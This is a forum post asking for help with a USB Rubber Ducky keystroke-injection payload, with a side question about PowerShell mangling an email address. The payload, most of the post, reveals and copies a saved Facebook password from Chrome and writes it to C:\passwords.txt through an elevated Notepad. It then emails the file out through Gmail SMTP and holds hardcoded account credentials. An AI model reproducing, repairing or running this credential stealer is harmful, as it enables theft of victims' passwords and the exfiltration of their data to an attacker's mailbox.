Jump to content

Issue with Rubber Ducky Code


Recommended Posts

I'm running this payload code but it appears that powershell not reading the email correctly. Instead reading it akh00157@gmail.com it changed to akh00157"gmail.com

 REM Author: Nuk3leus
REM Ducky chrome password stealer: 1.0
REM Target: Windows 7
REM Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, searches for facebook, shows password, copys password
REM closes chrome, Opens notepad with bypass uac so it can save to C:\ drive and pastes in password 
REM saves to C:\passwords.txt folder, closes notepad
REM sends files via gmail to account.
DELAY 2000
REM -------------open chrome
GUI r
DELAY 1000
STRING chrome
DELAY 1000
ENTER
DELAY 4000
REM -------------copy plaintext password
STRING chrome://settings/passwords
ENTER
DELAY 2000
STRING facebook
DELAY 500
TAB
DELAY 500
DOWN
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
ALT D
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
CTRL C
DELAY 500
ALT F4
DELAY 500
REM -------------save file to music folder as passwords.txt
GUI R
DELAY 500
STRING powershell start-process notepad.exe -Verb runAs
DELAY 500 
ENTER
DELAY 2000
ALT y
DELAY 1000
CTRL V
DELAY 500
ALT f
DELAY 500
STRING s
DELAY 500
STRING passwords.txt
DELAY 500
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
STRING c
DELAY 1000
STRING l
DELAY 500
ENTER
DELAY 500
ALT S
DELAY 1000
ALT F4
DELAY 500
REM -------------email log via gmail
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('akh001576@gmail.com', 'test1992');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'akh001576@gmail.com'
ENTER
STRING $ReportEmail.To.Add('************')
ENTER
STRING $ReportEmail.Subject = 'Ducky chrome passwords'
ENTER
STRING $ReportEmail.Body = 'Attached is your list of passwords.' 
ENTER
STRING $ReportEmail.Attachments.Add('c:\passwords.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 3000
STRING exit
ENTER

Link to comment
Share on other sites

  • 6 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...